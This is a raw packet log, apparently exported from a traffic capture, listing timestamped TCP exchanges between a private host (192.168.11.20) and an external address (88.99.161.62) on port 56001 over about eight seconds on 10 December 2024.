                                                                              Dec 10, 2024 07:02:03.581063032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.676486015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.676497936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.676505089 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.694528103 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.796263933 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.796278000 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.796288013 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.796535015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.816055059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.816201925 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.909787893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.909815073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.910032988 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.910059929 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.949208021 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.949374914 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.031438112 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.031470060 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.031658888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.062913895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.063086987 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.164621115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.164732933 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.198219061 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.198379993 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.278182030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.278635025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.313468933 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.313621998 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.413568020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.413777113 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.445389032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.445571899 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.528824091 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.528867006 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.529198885 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.569605112 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.569772959 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.660841942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.661289930 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.686012030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.698863983 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.699033976 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.785109043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.785403967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.811881065 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:04.914388895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.914484978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.914494038 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:04.944935083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.027247906 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.027259111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.027409077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.065679073 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.160234928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.160245895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.160810947 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.179564953 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.281110048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.281121016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.281135082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.281141043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.298305035 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.298451900 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.394889116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.395030022 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.395039082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.414679050 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.513598919 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.513741970 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.513753891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.532541990 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.532732964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.603686094 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.630119085 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.630131006 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.630253077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.648631096 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.747915030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.747925997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.748168945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.767272949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.767427921 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.862150908 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.862416029 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.863780022 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.863902092 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.881514072 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.881685972 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:05.982404947 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.982567072 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.982687950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:05.982938051 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.003012896 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.003187895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.081867933 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.096805096 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.097142935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.097246885 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.097254992 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.130861044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.131045103 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.134546995 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.218250036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.218478918 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.255048990 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.255235910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.345994949 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.346111059 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.346419096 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.353600979 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.354711056 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.381828070 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.470170021 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.470325947 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.470555067 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.470802069 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.498009920 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.498167038 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.597062111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.597167015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.597356081 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.597620964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.613715887 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.613867998 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.615817070 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.616002083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.713133097 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.713222980 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.713349104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.713603020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.734612942 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.734800100 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.830921888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.831191063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.831295967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.850680113 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.850867033 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.873488903 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.949830055 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.949943066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.950108051 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.950356960 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:06.987014055 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:06.987087011 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.066477060 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.066485882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.066492081 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.066498041 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.100323915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.100497961 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.202178955 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.217725992 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.217895985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.315660000 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.315675020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.315681934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.334657907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.334789991 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.433156967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.433170080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.433334112 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.433442116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.452054024 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.549902916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.549917936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.549994946 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.550220966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.568001032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.667294025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.667428017 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.667618036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.669141054 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.669297934 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.782555103 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.783318996 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.783339024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.882030964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.882141113 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:07.884429932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.884701014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.998136044 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:07.998147011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.001307011 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.097259045 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.097450972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.097460032 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.116076946 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.216545105 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.216555119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.233967066 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.234124899 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.331552982 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.331566095 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.331573009 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.353121042 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.449389935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.449400902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.449512959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.468919992 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.469046116 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.568346977 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.568541050 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.583242893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.583415985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.684073925 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.684217930 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.688168049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.688311100 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.798495054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.798640013 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.798741102 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.801529884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.801707029 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.899864912 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.899960995 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:08.903456926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:08.903625011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.016691923 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.017220974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.038158894 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.115251064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.115353107 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.132745028 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.236350060 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.253649950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.253663063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.347964048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.348162889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.348172903 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.354165077 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.451781988 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.451795101 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.469022989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.569591045 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.569636106 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.583686113 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.583805084 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.684500933 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.684545994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.684607983 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.687813044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.687980890 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.799274921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.799689054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.805798054 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.805922985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.901006937 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:09.903376102 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.903386116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:09.903548956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.017424107 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.021317005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.021511078 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.116411924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.116425037 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.116431952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.121709108 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.232758045 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.232857943 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.236916065 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.334264994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.334410906 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.337110996 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.337124109 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.438802004 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.452255964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.452269077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.549705982 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.549827099 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.549918890 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.555727959 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.555871964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.649270058 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.649420023 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.654247999 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.654259920 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.756171942 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.771199942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.771213055 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.771512985 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.771523952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.849987984 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.864701986 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.864799023 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:10.952009916 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.952130079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:10.971663952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.065527916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.065572023 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.071940899 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.072154999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.167572975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.167772055 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.167812109 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.168045998 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.172890902 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.173058987 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.287444115 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.287516117 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.287631989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.287662029 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.294460058 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.336524963 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.388231039 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.388442039 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.388454914 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.388611078 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.388704062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.502966881 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.502985001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.503196001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.506593943 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.506700993 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.552675009 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.602060080 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.603781939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.603817940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.603980064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.604799032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.604831934 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.706646919 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.706815004 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.721812963 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.721955061 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.820091963 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:11.820126057 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.820137024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.820161104 CET4976256001192.168.11.2088.99.161.62
